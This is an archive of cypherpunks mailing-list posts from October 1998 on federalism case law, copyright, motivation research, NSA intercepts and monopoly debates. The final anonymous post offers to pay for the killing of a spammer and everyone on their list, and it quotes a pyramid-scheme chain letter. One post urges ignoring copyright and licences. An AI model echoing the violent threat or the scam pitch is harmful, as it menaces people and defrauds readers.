> command the States' officers, or those of their political subdivisions, =
> to administer or enforce a federal regulatory program.'   That across =
> the board prohibition is simply being applied to various federal =
> mandates one after the other.=20
> =20
> CONDON v US,  Decided: September 3, 1998 =20
> 
> =20
> In 1994 Congress passed the Driver's Privacy Protection Act (DPPA), =
> which tried to set federal standards governing how and when information =
> in driving records could be released.   The DPPA said that  "Any State =
> department of motor vehicles that has a policy or practice of =
> substantial noncom- pliance . . . shall be subject to a civil penalty =
> imposed by the Attorney General of not more than $5,000 a day."=20
> =20
> South Carolina, joined by several other states, refused to implement the =
> Driver's Privacy Protection Act (DPPA), and sued the Federal government =
> in US Court demanding that the law be recognized by the federal courts =
> as a violation of the Tenth and Eleventh Amendments to the United States =
> Constitution.
> =20
> The Fourth Circuit Court struck down DPPA ruling that
> 
> 
> "Under our system of dual sovereignty, "[t]he powers not delegated to =
> the United States by the Constitution, nor prohibited by it to the =
> States, are reserved to the States respectively, or to the people." U.S. =
> Const. amend. X. Because Congress lacked the authority to enact the DPPA =
> under either the Commerce Clause or Section 5 of the Fourteenth =
> Amendment, we affirm the judgment of the district court."
> 
> 
> The Court also stated plainly that: "Congress may not enact any law that =
> would direct the functioning of the States' executives or legislatures." =
> 
> 
> Citing the New York and Printz cases the court said that the Supreme =
> Court's ruling with respect to federal mandates "has been a model of =
> consistency."=20
> 
> Some of the more important quotes from the case follow:
> 
> 
> In New York v. United States, 505 U.S. 144 (1992)  the Supreme Court =
> held that Congress could not "commandeer[ ] the legislative processes of =
> the States by directly compelling them to enact and enforce a federal =
> regulatory program."  ... In Printz v. US the court held "that Congress =
> cannot circumvent that prohibition by conscripting the State's officers =
> directly." Id. at 2384. The Court went on to note that  '[t]he Federal =
> Government may neither issue directives requiring the States to address =
> particular problems, nor command the States' officers, or those of their =
> political subdivisions, to administer or enforce a federal regulatory =
> program.' "
> =20
> 
> "The Supreme Court, in both New York and Printz, has made it perfectly =
> clear that the Federal Government may not require State officials to =
> administer a federal regulatory program."
> 
> 
> "Although Congress has regulated the disclosure of personal information =
> by some private parties, the Constitution permits Congress to regulate =
> the conduct of individuals. In contrast, Congress may not, as a general =
> matter, regulate the conduct of the States. See New York, 505 U.S. at =
> 166 ("[T]he Framers explicitly chose a Constitution that confers upon =
> Congress the power to regulate individuals, not States." (quoted with =
> approval in Printz, 117 S. Ct. at 2377)). "
> 
> "The United States also contends that the DPPA was properly enacted =
> pursuant to Congress's power under Section 5 of the Four- teenth =
> Amendment. In light of the Supreme Court's landmark decision in City of =
> Boerne v. Flores, 117 S. Ct. 2157 (1997), we are constrained to =
> disagree."
> 
> Congress's power to enact legislation under the Fourteenth Amendment is =
> not unlimited, however. See, e.g. , City of Boerne v. Flores, 117 S. Ct. =
> 2157, 2171 (1997) (holding that the Religious Freedom Restoration Act is =
> "a considerable congressional intrusion into the States' traditional =
> prerogatives," and that Congress exceeded its power under the Fourteenth =
> Amendment in enacting the statute); Gregory v. Ashcroft, 501 U.S. 452, =
> 469 (1991) (stating that "the Four- teenth Amendment does not override =
> all principles of federalism"); Oregon v. Mitchell, 400 U.S. 112, 128 =
> (1970) (noting that "[a]s broad as the congressional enforcement power =
> is, it is not unlimited"). For instance, Congress's power "extends only =
> to enforc[ing] the provi- sions of the Fourteenth Amendment." City of =
> Boerne, 117 S. Ct. at 2164 (emphasis added) (internal quotation marks =
> omitted). Of perhaps equal importance, it is only a preventative or =
> remedial power, not a substantive power. See id. at 2167. As a result, =
> Congress does not possess "the power to determine what constitutes a =
> constitutional violation." Id. at 2164.=20
> 
> 
> "neither the Supreme Court nor this Court has ever found a =
> constitutional right to privacy with respect to the type of information =
> found in motor vehicle records.   Accordingly, Congress did not have the =
> authority under Section 5 of the Fourteenth Amendment to enact the =
> DPPA."


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Thu, 1 Oct 1998 14:13:51 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Wire transfers from web page?
In-Reply-To: <Pine.LNX.3.95.980930220439.1025C-100000@online.offshore.com.ai>
Message-ID: <Pine.BSF.3.96.981001211053.8571A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 30 Sep 1998, Vincent Cate wrote:
 
> How about a bank on the Internet that will accept instructions to write
> and mail a check drawn on your account to any random person at any
> address? 

That's actually pretty common.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 1 Oct 1998 14:21:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I thought of an initialy regulated industry!...
Message-ID: <199810011922.VAA29274@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Personally, I favor the "Pournelle Solution": acquire a 10-mile by 10-mile
> region of the Mojave Desert. Not in an "ecologically interesting" area of
> Death Valley, but just out in the vast scrublands. Erect a double fence
> around it, and perhaps even a minefield (if one is worried about thefts of
> nuclear waste). Pile the spent fuel rods, medical gear, gloves, etc. on
> pallets separated  by wide roads from other pallets. This "solves" the
> waste problem for at least a matter of many decades, by which time various
> technologies will likely have presented other and better solutions. Cost is
> low, convenience is high, safety is good, environmental polllution is nil.

So what do you do when it rains?

It does rain in the Mojave desert, you know.  And it rains hard,
in the summer thunderstorm season.  That's a lot of water to sluice
away radioactive material into the washes and arroyos, leading down to
populated areas.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 1 Oct 1998 15:41:17 +0800
To: petro@playboy.com
Subject: copyright at the point of a gun
In-Reply-To: <v04011701b239821d8135@[206.189.103.244]>
Message-ID: <199810012027.VAA09013@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Christopher Petro writes:
> 	I never said they should, however in this case I will make the
> arguement that the Feds DID have something to do with creating the
> Jaggernaut called M$, and that they could also fix Billys little redmond
> wagon without a court case shoud they wish.

On the Feds buying M$ software (no big deal ... if it suits them let
them buy it).

The real subsidy of M$ and any software vendor is the copyright,
patent, and license enforcement mechanism provided by the government.

Don't forget that copyright enforcement boils down to thugs with guns
coming to lock you up.

In a crypto-anarchic society concepts such as copyright, license and
patents have little meaning because the obvious statement of reality
is that once you have released something to another individual, you
lose all control over it.

With strong anonymity, ecash and so on, even things like GNU, patents,
export controls whatever can be swept away for individuals, and for
anonymous companies.  GNU license?  No problem, just ignore the
license.  Copright?  No problem just ignore the copyright notices,
strip them off.  Patents?  Ignore them to.

If people still buy software, or support contracts from anonymous
companies who ignore patents, well that is the market deciding what it
thinks of copyright.

Judging by the state of software-piracy with PC software with 80-90%+
piracy rates, the market is already pretty much ok with ignoring
copyright, and would be happy to have no copyrights.

The bounty scheme, support contracts are much closer to the natural
schelling points in a free society than "enforcement" of bit flow, and
ideas.

FSF is the first wave.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 1 Oct 1998 15:47:54 +0800
To: rah@shipwright.com
Subject: importance of motivation (Re: EduFUD: Computers, software can harm emotional, social development)
In-Reply-To: <v04011741b239749c38d9@[139.167.130.248]>
Message-ID: <199810012036.VAA09025@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Robert Hettinga writes:
> By the way, "span" is the wrong word for ADD. I was hardly raised on TV,
> much less computers, (I had my face in science fiction books throughout
> most of my childhood), and I've been known to focus on something
> "inappropriately" for hours.
> 
> While I certainly have varying degrees of control of my attention, but I
> just don't see that a "handicap" anymore. My attention is event-driven,
> rather than processed in neat organized batches, and I've learned to like
> it that way, even if it did give me trouble when I was chained in the
> aforementioned tower's dungeon for most of my formative years.

That doesn't sound like ADD, that sounds like human nature.  People
pay attention and focus on what interests them.

Some things I drag through slowly and put off because they are boring,
other things (say like eternity servers), when I have a new idea, I do
more in 3 days (@ 20 hours/day) than I would otherwise do in a month
on a boring project.  I suspect many programmer types are similar,
interest in the job is all important.  This phenomena motivates quotes
like Attila's one about managing programmers being like "herding cats".

I don't see why a ecash advocate, evangelist, and writer should have
a different experience.

(Or do I have ADD too?)

btw. you should read (if you haven't) this piece distributed with
emacs attached below.  I find it rings very true.

Adam

% cat /usr/share/emacs/19.31/etc/MOTIVATION
STUDIES FIND REWARD OFTEN NO MOTIVATOR

Creativity and intrinsic interest diminish if task is done for gain

By Alfie Kohn
Special to the Boston Globe
[reprinted with permission of the author
 from the Monday 19 January 1987 Boston Globe]

In the laboratory, rats get Rice Krispies.  In the classroom the top
students get A's, and in the factory or office the best workers get
raises.  It's an article of faith for most of us that rewards promote
better performance.

But a growing body of research suggests that this law is not nearly as
ironclad as was once thought.  Psychologists have been finding that
rewards can lower performance levels, especially when the performance
involves creativity.

A related series of studies shows that intrinsic interest in a task -
the sense that something is worth doing for its own sake - typically
declines when someone is rewarded for doing it.

If a reward - money, awards, praise, or winning a contest - comes to
be seen as the reason one is engaging in an activity, that activity
will be viewed as less enjoyable in its own right.

With the exception of some behaviorists who doubt the very existence
of intrinsic motivation, these conclusions are now widely accepted
among psychologists.  Taken together, they suggest we may unwittingly
be squelching interest and discouraging innovation among workers,
students and artists.

The recognition that rewards can have counter-productive effects is
based on a variety of studies, which have come up with such findings
as these: Young children who are rewarded for drawing are less likely
to draw on their own that are children who draw just for the fun of
it.  Teenagers offered rewards for playing word games enjoy the games
less and do not do as well as those who play with no rewards.
Employees who are praised for meeting a manager's expectations suffer
a drop in motivation.

Much of the research on creativity and motivation has been performed
by Theresa Amabile, associate professor of psychology at Brandeis
University.  In a paper published early last year on her most recent
study, she reported on experiments involving elementary school and
college students.  Both groups were asked to make "silly" collages.
The young children were also asked to invent stories.

The least-creative projects, as rated by several teachers, were done
by those students who had contracted for rewards.  "It may be that
commissioned work will, in general, be less creative than work that is
done out of pure interest," Amabile said.

In 1985, Amabile asked 72 creative writers at Brandeis and at Boston
University to write poetry.  Some students then were given a list of
extrinsic (external) reasons for writing, such as impressing teachers,
making money and getting into graduate school, and were asked to think
about their own writing with respect to these reasons.  Others were
given a list of intrinsic reasons:  the enjoyment of playing with
words, satisfaction from self-expression, and so forth.  A third group
was not given any list.  All were then asked to do more writing.

The results were clear.  Students given the extrinsic reasons not only
wrote less creatively than the others, as judged by 12 independent
poets, but the quality of their work dropped significantly.  Rewards,
Amabile says, have this destructive effect primarily with creative
tasks, including higher-level problem-solving.  "The more complex the
activity, the more it's hurt by extrinsic reward," she said.

But other research shows that artists are by no means the only ones
affected.

In one study, girls in the fifth and sixth grades tutored younger
children much less effectively if they were promised free movie
tickets for teaching well.  The study, by James Gabarino, now
president of Chicago's Erikson Institute for Advanced Studies in Child
Development, showed that tutors working for the reward took longer to
communicate ideas, got frustrated more easily, and did a poorer job in
the end than those who were not rewarded.

Such findings call into question the widespread belief that money is
an effective and even necessary way to motivate people.  They also
challenge the behaviorist assumption that any activity is more likely
to occur if it is rewarded.  Amabile says her research "definitely
refutes the notion that creativity can be operantly conditioned."

But Kenneth McGraw, associate professor of psychology at the
University of Mississippi, cautions that this does not mean
behaviorism itself has been invalidated.  "The basic principles of
reinforcement and rewards certainly work, but in a restricted context"
- restricted, that is, to tasks that are not especially interesting.

Researchers offer several explanations for their surprising findings
about rewards and performance.

First, rewards encourage people to focus narrowly on a task, to do it
as quickly as possible and to take few risks.  "If they feel that
'this is something I hve to get through to get the prize,' the're
going to be less creative," Amabile said.

Second, people come to see themselves as being controlled by the
reward.  They feel less autonomous, and this may interfere with
performance.  "To the extent one's experience of being
self-determined is limited," said Richard Ryan, associate psychology
professor at the University of Rochester, "one's creativity will be
reduced as well."

Finally, extrinsic rewards can erode intrinsic interest.  People who
see themselves as working for money, approval or competitive success
find their tasks less pleasurable, and therefore do not do them as
well.

The last explanation reflects 15 years of work by Ryan's mentor at the
University of Rochester, Edward Deci.  In 1971, Deci showed that
"money may work to buy off one's intrinsic motivation for an activity"
on a long-term basis.  Ten years later, Deci and his colleagues
demonstrated that trying to best others has the same effect.  Students
who competed to solve a puzzle quickly were less likely than those who
were not competing to keep working at it once the experiment was over.

Control plays role

There is general agreement, however, that not all rewards have the
same effect.  Offering a flat fee for participating in an experiment -
similar to an hourly wage in the workplace - usually does not reduce
intrinsic motivation.  It is only when the rewards are based on
performing a given task or doing a good job at it - analogous to
piece-rate payment and bonuses, respectively - that the problem
develops.

The key, then, lies in how a reward is experienced.  If we come to
view ourselves as working to get something, we will no longer find
that activity worth doing in its own right.

There is an old joke that nicely illustrates the principle.  An
elderly man, harassed by the taunts of neighborhood children, finally
devises a scheme.  He offered to pay each child a dollar if they would
all return Tuesday and yell their insults again.  They did so eagerly
and received the money, but he told them he could only pay 25 cents on
Wednesday.  When they returned, insulted him again and collected their
quarters, he informed them that Thursday's rate would be just a penny.
"Forget it," they said - and never taunted him again.

Means to and end

In a 1982 study, Stanford psychologist Mark L. Lepper showed that any
task, no matter how enjoyable it once seemed, would be devalued if it
were presented as a means rather than an end.  He told a group of
preschoolers they could not engage in one activity they liked until
they first took part in another.  Although they had enjoyed both
activities equally, the children came to dislike the task that was a
prerequisite for the other.

It should not be surprising that when verbal feedback is experienced
as controlling, the effect on motivation can be similar to that of
payment.  In a study of corporate employees, Ryan found that those who
were told, "Good, you're doing as you /should/" were "significantly
less intrinsically motivated than those who received feedback
informationally."

There's a difference, Ryan says, between saying, "I'm giving you this
reward because I recognize the value of your work" and "You're getting
this reward because you've lived up to my standards."

A different but related set of problems exists in the case of
creativity.  Artists must make a living, of course, but Amabile
emphasizes that "the negative impact on creativity of working for
rewards can be minimized" by playing down the significance of these
rewards and trying not to use them in a controlling way.  Creative
work, the research suggests, cannot be forced, but only allowed to
happen.

/Alfie Kohn, a Cambridge, MA writer, is the author of "No Contest: The
Case Against Competition," recently published by Houghton Mifflin Co.,
Boston, MA.  ISBN 0-395-39387-6. /
%




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 1 Oct 1998 15:53:53 +0800
To: sbryan@vendorsystems.com
Subject: reformatting C:\Washington-DC (Re: [RRE]Conference: Technological Visions)
In-Reply-To: <v03102802b23987fefd5d@[192.168.3.63]>
Message-ID: <199810012041.VAA09030@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Steve Bryan writes:
> Tim May
> >Y2K: A good chance to reformat America's hard drive and empty the trash.
> 
> If you reformat the drives, there's no need to empty the trash.

I suspect the quote was meant to imply that the "trash" would get
overwritten with 0s (or as this is cypherpunks overwritten with high
quality random number output, multiple times!)

(And if you want to be nitpicky about the metaphor, reformatting
doesn't overwrite with 0s, typically, so the trash and all would still
be there.)

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 1 Oct 1998 16:02:06 +0800
To: petro@playboy.com
Subject: business regulatory burden (Re: GPL & commercial software, the critical distinction)
In-Reply-To: <v04011703b239868e8c60@[206.189.103.244]>
Message-ID: <199810012045.VAA09036@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Christoper Petro writes:
> >If you seriously think this is a heavily regulated market you should do more
> >research into such places as Nazi Germany, Russia, China, etc.
> 
> 	France, England etc.
> 
> 	We are _going_ that route, with more and more regualtion being
> dumped on the backs of businesses daily.

Yup I can confirm that one for England.  I made the mistake of
registering a Ltd company to do crypto hacking through, and you would
not believe the mountain of forms they send you.  I reckon I must've
had order of a foot deep pile of paper sent to me since doing it.  As
a one man type operation, most of it can go straight in the trash, but
you've still got to sift it.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 1 Oct 1998 21:49:33 +0800
To: users@einstein.ssz.com (SSZ User Mail List)
Subject: INFO-RUSS: "Post-Soviet Science and Technology" class (fwd)
Message-ID: <199810020250.VAA23198@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From INFO-RUSS-request@smarty.ece.jhu.edu Thu Oct  1 21:43:40 1998
Message-Id: <9810012329.AA25272@smarty.ece.jhu.edu>
Errors-To: INFO-RUSS-request@smarty.ece.jhu.edu
Sender: INFO-RUSS-request@smarty.ece.jhu.edu
Date: Thu, 1 Oct 1998 15:19:28 -0700
To: info-russ@smarty.ece.jhu.edu
From: "Andrei G. Chakhovskoi" <chakhovs@ece.ucdavis.edu>
Subject: INFO-RUSS: "Post-Soviet Science and Technology" class

---------------------------------------------------------------------
This is INFO-RUSS broadcast (1200+ subscribers). Home page, information, 
and archives: http://psi.ece.jhu.edu/~kaplan/IRUSS/inforuss.html
To post, or to subscribe/unsubscribe, mail to info-russ@smarty.ece.jhu.edu
INFO-RUSS assumes no responsibility for the information/views of its users.
---------------------------------------------------------------------


Dear INFO-RUSS netters:

I am teaching a class on "Post-Soviet Science and Technology" at the
University of California at Davis.

If you can share any information, personal experience, or if you can point
to an information source relevant to the subject - please respond to the
message below.


This year, I begin teaching a class which talks about a recent history and
up-to-date changes in science, technology and ecology in Russia and the
republics of the former USSR.

This class is more like an "experimental" effort to take a look at the
current situation in scientific and technology field in former USSR. Being
involved for many years in high-tech research in Russian Academy of
Sciences as well as in several defense R&D institutions in Moscow and the
vicinity, I am naturally interested to learn what is happening there now.
Although I am working at UC Davis since 1992, I am still involved in a
number of collaborative projects with my former Russian and Ukranian
co-workers.

I was sharing my thoughts about the situation in Soviet science and
technology with my colleagues at UC Davis and Sandia NL, as well as with
scientists at various forums and conferences; and I found that there is
actually a big interest to this issue. Sometimes a spontaneous discussion
has originated from these conversations, leading to an invitation to give a
talk about the subject. People were interested to hear about current
challenges and difficulties faced by Russian scientists as well as about
intellectual and technological potential accumulated in Russia and former
USSR countries. And always the audience was interested to hear more
information and details than could be delivered in one single talk.

After a few talks I decided to expand the effort and I approached the
Teaching Resources Center at UC Davis with a proposal to originate an
interdepartmental seminar on this subject. The idea was welcomed, and the
seminar got approved for the Fall of 1998. Currently, this is one-quarter
(8 weeks) seminar for a small group of students (15 people) from different
specialities. Most of them are freshman who do not have chosen a major
speciality yet. Depending the success of this seminar it may eventually
grow into a bigger course.

The exact title of this seminar is "The Effects of the Changing Economy on
Technology and Ecology in Russia and New Independent Countries". The term
"Changing Economy" here is not just economy but also implies "State and
Political System". Although I will try to concentrate on science and
technology more than on politics and economy, I afraid that it will be
impossible to ignore political and economical issues, especially due to the
recent crisis in Russia.

Because of the nature of this seminar and the subject studied, there is no
solid curriculum or a single book which can be used throughout the quarter.
The students need to collect the most recent information from the Internet
and periodicals and they are encouraged to study and compare different
opinions obtained from various communication sources.

I do have a growing collection of WEB-links and press documents relevant to
the subject, but this collection is far from being complete. I will
appreciate it if you can point to the WEB-links, to newsgroups which
discuss relevant issues, or to documents which can be downloaded and used
for this class.

I will especially appreciate it if you have materials like photos, brief
videos, documents, magazines, newspapers which you can loan or share for
this seminar. If it involves copying expenses I can make copies of the
materials and return the originals, or I can provide a reimbursement for
copying/mailing expenses.

All the materials will be used for educational purpose only, the source or
the author of the material will be identified with a proper reference and
acknowledgement.

A very important part of this seminar is related to a personal experience
shared by people who are working or used to work in this field. I will
appreciate any documents of a personal matter - memories, stories which can
be shared with the students.

Also, I would like to invite interested parties to join a discussion as
invited speakers. I would like to invite somebody who was involved in joint
research/development projects between USA and Russia, who is working in the
field related to technology transfer and international scientific
collaboration, or who just has an experience working in high-tech field in
Russia to share his/her experience and feelings.

If anybody is living not very far from Davis, CA or traveling in Northern
California in October/November - I would be extremely delighted if you find
it possible to give a talk at this seminar.
We meet each Tuesday between October 6 and November 24.

Unfortunately, due to the size of the seminar the budget for this quarter
is quite limited so I will not be able to offer you a generous honorarium,
or fly you from New York or Boston, but at least I can reimburse you for
the travel from San Francisco Bay area / Silicon Valley (about $ 50).

Please e-mail me at chakhovs@ece.ucdavis.edu

Thanks and best regards,

Dr. Andrei G. Chakhovskoi
Lecturer / Research Scientist
University of California at Davis
Department of Electrical and Computer Engineering




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 1 Oct 1998 23:55:27 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: New California Spam Law is Bullshit
In-Reply-To: <v03130301b238bcb67703@[209.133.20.6]>
Message-ID: <v03130300b23a0ce9820b@[209.66.100.43]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:20 AM -0700 9/30/98, Rabid Wombat wrote:
>Got an actual cite for this, or better yet a url to the actual statute?
>
>On Wed, 30 Sep 1998, Tim May wrote:
>
>> At 6:43 PM -0700 9/30/98, Max Inux wrote:
>> >On Wed, 30 Sep 1998 2001files@usa.net wrote:
>> >
>> >Dear spammer,
>> >
>> >Nice threats are attached to this spam.  I love new ideas from the
>> >spamming community. Please be aware by not  including a real human email
>> >address (specifically stated) and a 1800 number to call to be removed,
>> >you are in violation of California law.

It just got discussed on the CP list. Check yesterday's traffic.

(No, I won't do this research. Not because I'm being a hardass, but because
I deleted them after reading them.)

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 1 Oct 1998 21:10:55 +0800
To: cypherpunks@toad.com
Subject: Echelon's Origin
Message-ID: <199810020204.WAA04835@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The NSA released during the summer a Top Secret
memorandum by Truman in 1952 establishing NSA 
as the lead COMINT agency for the USG:

   http://jya.com/nsa102452.htm

After the dry description of decisionmaking procedures
there are tantalizing pointers to the means NSA is to
use to spy on foreign governments' communications, 
with reference to accommodating allies at NSA facilities
-- read it carefully.

Also, it's chilling to read that COMINT was so vital that
Truman declared it to be free from any constraints placed 
on all other forms of intelligence. And the DIRNSA was given
authority to command any military department or civilian
agency for COMINT purposes

It would be helpful to learn what superceded this memo for
authority to engage in global COMINT. Yes, we accept
anonymous contributions for COMINTers.

Erich Moechel writes that France has its version of Echelon
and wiretapping, and shares its fruits with Germany, in 
competition with the Echelon-Five. 

   The French have built up an Echelon like wiretapping system 
   of their own, operating from Dordogne (France), French Guayana 
   & Nouvelle Caledonie.

Would anyone have more information on this program? And what
about other Echelons around the world?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 2 Oct 1998 00:49:50 +0800
To: Cypherpunks <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928471D@mossbay.chaffeyhomes.com>
Message-ID: <199810020548.WAA02571@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 02:18 PM 10/1/98 -0500, Kevin Elliott wrote:
> I'm afraid sir, that your ingonorance is showing.  Pick up
> any college (hell, high school) ecomonics textbook.
> Certain types of businesses are inheritly advantagious to
> monopolies.  The electric company is the classic example-
> their is no cost effective way for an electric company to
> supply power to a given area unless it is a monopoly.
> Certain types of businesses are suited to certain types of
> competition, and, unregulated, monopolies are exactly what
> you get.  This was exactly the situation that occured at 
> the turn of the century and it happened because regulation
> was non-existant!   

Bullshit.  No monopoly has ever happened except by regulation
I have no idea what you are referring to in your reference to
the turn of the century.  If you are referring to standard
oil, you are parroting silly communist propaganda with no
basis in reality.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     jeE+LNH/f8RnmYDChWQ48wf3pqRR6WcCMCJYSUXI
     45eF2HkK+9DX6z7XPNhbGoHJc96S3SuJ9SBUnw+iJ
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 2 Oct 1998 00:50:16 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810012235.RAA21520@einstein.ssz.com>
Message-ID: <199810020549.WAA04644@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Show me an example of an unregulated coercive monopoly
> > whose source of monopoly power is not ultimately the
> > government.

At 05:35 PM 10/1/98 -0500, Jim Choate wrote:
> The Mafia. The handful of world-class coke dealers. Your
> local church

In america the various mafias get plently of competition,
mostly by means short of actual warfare.  Coke is a free
market except for police intervention, and the local church
is most certainly not a monopoly.

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     oGREc6gOTKaJiYcMP+JEyW9SUvzFpjz79BkXyfAM
     4f+hqTPS/vPcpcTNefkMrftiYGG7rMXSAonNu7im6
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 2 Oct 1998 01:37:52 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: Rain in Death Valley
In-Reply-To: <000001bded72$f7c55000$8a2580d0@ibm>
Message-ID: <v03110725b23a306846c9@[209.109.232.196]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:37 PM -0800 10/1/98, Robert Hettinga wrote:
>At 3:37 PM -0400 on 10/1/98, X wrote:
>
>
>> If the area you refer to is below sea-level, where would the hard-rains
>> runoff run off to?
>
>True enough. The water runs off the mountains *into* most of Death Valley,
>not *out* of it.

Where it evaporates.  Less than 10% humidity.


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 1 Oct 1998 17:05:13 +0800
To: cypherpunks@toad.com
Subject: Re: Been there....Done that....
Message-ID: <199810012154.XAA13706@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Jenny672,

Wow, what a spectacular offer you've given us!  And guess what?
Today's your lucky day!  You know why?  I'll tell you.  See, I'm
independently wealthy, and so while I have no need to participate
in your scam, I've decided that it would definitely be worth $10,000
of my own money to have you and everyone else on your stinking
list killed!

I know, you're saying, "How does that make it my *lucky* day?"  The
reason you don't know is because you're brain dead.  So I'll tell you,
and you'll just have to believe me.  See, when you're dead, the world
will be a much better place.  Intelligent people everywhere will rejoice,
and maybe, just maybe, your excruciatingly painful and torturous
death will help bring people together in the common cause of killing
everyone else in the world like you.  So won't you be happy to know
that your death will bring about a better world?  It's your lucky day,
because you get to make the *whole world* a better place!

Thanks for the opportunity, my friend!  You've made my day!


At 01:14 PM 10/1/98 -0700, jenny672@usa.net wrote:
>Dear Friend,
>
>
>I want to share this with you, I am sure like me you have tried many
>different opportunities at home and most of them don't work, or they want
>more money than we can afford. I figured what's $5 when we have spent so
>much more.....
>
>Need some fast cash? Try this:
>
>*******************************************************************
>If you are prepared to read on, BE PREPARED TO GET EXCITED...YOU
>WON'T BE DISAPPOINTED!
>
>*******************************************************************
>Read the following and you will agree this is a very exciting
>opportunity. Only invest a little bit of time and your reward could
>mean thousands of dollars! Good luck!
>
>*********************************************************************
>
>$$$ ARE YOU IN NEED OF MONEY? RIGHT NOW? $$$
>$$$ HOW DOES US$10,000 IN TWO(2) WEEKS (or less) SOUND? $$$
>
>Don't laugh! This a very logical and rewarding opportunity! 
>One(1) hour of work to get started and NO MAILING LISTS!
>
>--------Esquire Marketing Newsletter Gift Club--------
>
>*********************************************************************
>
>If you need to make a few thousand dollars REALLY FAST, then please take
>a moment to read this simple program I am sharing with you. No, it is
>NOT what you think! YOU DO NOT have to send $5.00 to five people to buy
>a report, buy a recipe, or any other product. Nor will you need to
>invest more money later to get things going. THIS IS THE FASTEST,
>EASIEST PROGRAM YOU WILL EVER DO! Complete it in ONE HOUR and you will
>never forget the day you first received it. 
>
>--------This Is How It Works--------
>
>Unlike many other programs, this three-level program is more realistic
>and much, much faster. Because it is so easy, the response rate for this
>program is VERY HIGH and VERY FAST, and you will see results in two
>weeks or less! Just in time for next month's bills!
>
>You only mail out 20 copies ( not 200 or more as in other programs). You
>should also try to send them to PEOPLE WHO SEND YOU THEIR PROGRAMS
>because they know THESE PROGRAMS WORK and they are already believers
>in the system! Besides, this program is much, much FASTER and has a HIGHER
>RESPONSE RATE.
>
>Even if you are already in a similar program, STAY WITH IT, but do yourself a
>favor and DO THIS ONE as well. START RIGHT NOW! It's simple and takes
>a very small investment. It will pay off long before other letters even
>begin to trickle in!
>
>Just give ONE person a US $5.00 gift. That' s all!
>
